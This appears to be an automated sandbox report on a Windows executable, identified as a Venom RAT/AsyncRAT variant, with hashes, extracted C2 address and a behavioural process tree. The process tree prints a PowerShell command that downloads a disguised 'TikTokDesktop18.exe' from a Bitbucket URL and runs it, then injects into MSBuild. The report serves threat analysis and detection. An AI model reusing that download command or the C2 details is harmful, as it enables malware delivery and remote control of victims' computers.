Analysis
-
max time kernel
102s -
max time network
119s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-11-2024 21:59
Static task
static1
Behavioral task
behavioral1
Sample
017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe
Resource
win7-20240903-en
General
-
Target
017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe
-
Size
89KB
-
MD5
834924ac31fd6b5978bad287da3f99f9
-
SHA1
3289c8848c485ededbc7600171d74e9570553376
-
SHA256
017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1
-
SHA512
feaaf94fd41de5e86fc90f4cc49a57326deb2f1edce1b96384e36924b81727ecabab9a88723348f8962f370564fd1565c1bea6f2230e6c28f710a55a50eb6639
-
SSDEEP
1536:z7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfAw3OL:v7DhdC6kzWypvaQ0FxyNTBfAd
Malware Config
Extracted
https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
212.15.49.155:4449
zuvtbmtrjnwecuy
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Processes:
resource yara_rule behavioral2/memory/4500-32-0x0000000000780000-0x00000000007AC000-memory.dmp VenomRAT -
Venomrat family
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid Process 7 4408 powershell.exe 13 4408 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
TikTokDesktop18.exepid Process 2080 TikTokDesktop18.exe -
Loads dropped DLL 1 IoCs
Processes:
TikTokDesktop18.exepid Process 2080 TikTokDesktop18.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
TikTokDesktop18.exedescription pid Process procid_target PID 2080 set thread context of 4500 2080 TikTokDesktop18.exe 91 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exeTikTokDesktop18.exeMSBuild.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TikTokDesktop18.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exeMSBuild.exepid Process 4408 powershell.exe 4408 powershell.exe 4500 MSBuild.exe 4500 MSBuild.exe 4500 MSBuild.exe 4500 MSBuild.exe 4500 MSBuild.exe 4500 MSBuild.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeMSBuild.exedescription pid Process Token: SeDebugPrivilege 4408 powershell.exe Token: SeDebugPrivilege 4500 MSBuild.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
MSBuild.exepid Process 4500 MSBuild.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.execmd.execmd.exeTikTokDesktop18.exedescription pid Process procid_target PID 1428 wrote to memory of 436 1428 017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe 84 PID 1428 wrote to memory of 436 1428 017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe 84 PID 436 wrote to memory of 4408 436 cmd.exe 85 PID 436 wrote to memory of 4408 436 cmd.exe 85 PID 436 wrote to memory of 3680 436 cmd.exe 88 PID 436 wrote to memory of 3680 436 cmd.exe 88 PID 3680 wrote to memory of 2080 3680 cmd.exe 89 PID 3680 wrote to memory of 2080 3680 cmd.exe 89 PID 3680 wrote to memory of 2080 3680 cmd.exe 89 PID 2080 wrote to memory of 4500 2080 TikTokDesktop18.exe 91 PID 2080 wrote to memory of 4500 2080 TikTokDesktop18.exe 91 PID 2080 wrote to memory of 4500 2080 TikTokDesktop18.exe 91 PID 2080 wrote to memory of 4500 2080 TikTokDesktop18.exe 91 PID 2080 wrote to memory of 4500 2080 TikTokDesktop18.exe 91 PID 2080 wrote to memory of 4500 2080 TikTokDesktop18.exe 91 PID 2080 wrote to memory of 4500 2080 TikTokDesktop18.exe 91 PID 2080 wrote to memory of 4500 2080 TikTokDesktop18.exe 91 PID 2080 wrote to memory of 4500 2080 TikTokDesktop18.exe 91 PID 2080 wrote to memory of 4500 2080 TikTokDesktop18.exe 91 PID 2080 wrote to memory of 4500 2080 TikTokDesktop18.exe 91
Processes
-
C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1428 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A894.tmp\A895.tmp\A896.bat C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe', 'C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe')";3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4408
-
-
C:\Windows\system32\cmd.execmd.exe /c C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe;3⤵
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exeC:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe ;4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4500
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
260B
MD51904675eec0f302424c4bde0956dab54
SHA1267c3174e35e0e2a7d104f98b3326f313f2e464e
SHA25645fa85497886f443950af5fbd09098407a05345925fd942ac49eda67a93657e6
SHA512fe3682e4c1d36e14d4bb6ced55d62b609a8417a98731207246f7b9419724d5463246f641e1c4b1b53ec9358e65d7938ecc0b71f2ea09455bdb61815761e9f6f3
-
Filesize
501KB
MD5e619fff5751a713cf445da24a7a12c94
SHA19fc67a572c69158541aaaab0264607ada70a408c
SHA25611fbd295494309d56d775a11f805544737ce71d058a716194c0fd5b800cdc6d9
SHA51207420c9a0336ae350567abf68d7f5ef52b34c4c010dbabae6693bf27fd5a50a8b2b16696a3bed7bdc846d542eb04ce6102d5387484f352f9d09c8789ccfcd9ae
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
256KB
MD58d662564d514751028c65d96c696271f
SHA18e27943b7b901a808d39a7ee6977e1d3769a15fb
SHA25686af5d6ee9d824ec2dfa73f44b9ae285d33e9748a8b6dbd4333d1ae06cf6f72b
SHA5120a5460bbe7f43db560a08e508381613098a28de208a9d85c9c41fffa62b1e0299389a575dfa2b78767d3dd0fc73f0c88677ca32d7fe4e87698def1386cf35bef